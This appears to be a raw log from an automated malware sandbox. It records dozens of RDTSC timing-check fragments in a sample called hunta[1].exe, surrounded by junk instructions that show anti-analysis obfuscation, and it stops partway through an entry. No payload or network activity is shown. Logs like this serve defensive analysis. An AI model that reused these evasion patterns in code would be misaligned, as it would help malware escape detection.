Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219441 second address: 121944B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121944B second address: 1219450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219450 second address: 121945A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121945A second address: 1219460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1130EB6 second address: 1130EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219E98 second address: 1219EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD49 second address: 121DD5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E5514DE6h 0x00000008 jnc 00007FF2E5514DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD5D second address: 121DD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD63 second address: 121DD6D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD6D second address: 121DD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1233580 second address: 123359D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FF2E5514DF5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 123359D second address: 12335CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF2E55A2C26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FF2E55A2C26h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12335CD second address: 12335D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12335D3 second address: 12335E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C30h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12335E8 second address: 12335F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 122FDD6 second address: 122FDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1245C29 second address: 1245C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1245C2D second address: 1245C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D986 second address: 126D98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D98A second address: 126D99E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C2Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126C7D4 second address: 126C7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF2E5514DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CACF second address: 126CB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF2E55A2C2Bh 0x0000000d pop edi 0x0000000e jmp 00007FF2E55A2C2Eh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CB06 second address: 126CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FF2E5514DE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CB19 second address: 126CB32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CB32 second address: 126CB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CCA3 second address: 126CCA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CCA9 second address: 126CCB3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CDFD second address: 126CE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CE1F second address: 126CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D100 second address: 126D10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF2E55A2C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D10B second address: 126D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D111 second address: 126D119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D587 second address: 126D58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D58B second address: 126D591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D591 second address: 126D59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D59A second address: 126D5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D6CE second address: 126D6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12719E9 second address: 12719F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12719F3 second address: 12719F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 592092B second address: 592092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 592092F second address: 5920935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F00FD second address: 58F010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F010C second address: 58F0176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E5514DEEh 0x0000000f push eax 0x00000010 jmp 00007FF2E5514DEBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF2E5514DF6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF2E5514DF7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59608B2 second address: 59608B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0BD2 second address: 58E0BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0BD8 second address: 58E0C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 and ax, 1228h 0x0000000e jmp 00007FF2E55A2C2Bh 0x00000013 popfd 0x00000014 mov si, EB1Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C31h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0C14 second address: 58E0C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 sbb si, 40CEh 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF2E5514DF0h 0x0000001a adc ax, 3948h 0x0000001f jmp 00007FF2E5514DEBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FF2E5514DEFh 0x0000002f mov ah, 3Fh 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF2E5514DEEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0C98 second address: 58E0C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0C9E second address: 58E0CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0CA2 second address: 58E0CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, di 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0CD0 second address: 58E0CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0CD5 second address: 58E0CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309AA second address: 59309AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309AE second address: 59309B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309B2 second address: 59309B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309B8 second address: 59309E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 34h 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 3DFD71AFh 0x00000012 pushad 0x00000013 call 00007FF2E55A2C32h 0x00000018 pop eax 0x00000019 mov eax, edi 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309E9 second address: 59309ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309ED second address: 59309F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309F1 second address: 59309F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309F7 second address: 59309FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309FD second address: 5930A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930A01 second address: 5930A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930A18 second address: 5930A35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5980379 second address: 598037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 598037F second address: 5980383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5980383 second address: 59803B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E55A2C34h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59803B3 second address: 59803B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59803B9 second address: 59803BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960E03 second address: 5960E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960E09 second address: 5960E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F054D second address: 58F0553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F0553 second address: 58F0557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F0557 second address: 58F0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF2E5514DEEh 0x00000012 pop ebp 0x00000013 pushad 0x00000014 push esi 0x00000015 mov dl, 1Ch 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 596063D second address: 5960662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E55A2C2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960662 second address: 5960668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960668 second address: 596066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 596066C second address: 59606ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF2E5514DEFh 0x00000013 jmp 00007FF2E5514DF3h 0x00000018 popfd 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF2E5514DF6h 0x00000020 xor esi, 3A0D51E8h 0x00000026 jmp 00007FF2E5514DEBh 0x0000002b popfd 0x0000002c mov ecx, 076D95DFh 0x00000031 popad 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF2E5514DECh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59606ED second address: 59606F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59606F1 second address: 59606F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59606F7 second address: 596070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov di, F68Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 596070C second address: 5960728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960728 second address: 596073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C5C second address: 5960C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C79 second address: 5960C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, 6CE9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C98 second address: 5960C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960C9D second address: 5960CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E55A2C2Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edx 0x00000016 push edx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960CCF second address: 5960CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960CD4 second address: 5960D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF2E55A2C2Eh 0x0000000a xor si, 8348h 0x0000000f jmp 00007FF2E55A2C2Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f mov edi, 5CC8DA24h 0x00000024 popad 0x00000025 and dword ptr [eax], 00000000h 0x00000028 jmp 00007FF2E55A2C33h 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 pop edi 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 pushfd 0x00000039 jmp 00007FF2E55A2C2Ch 0x0000003e xor al, 00000008h 0x00000041 jmp 00007FF2E55A2C2Bh 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF2E55A2C35h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930929 second address: 593092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593092D second address: 5930933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5960F85 second address: 5960F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59107F3 second address: 5910877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b sbb al, 0000004Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push ebx 0x0000001b pop eax 0x0000001c pop edi 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushfd 0x00000024 jmp 00007FF2E55A2C33h 0x00000029 jmp 00007FF2E55A2C33h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FF2E55A2C2Ah 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 mov cx, di 0x00000044 mov dx, F0CCh 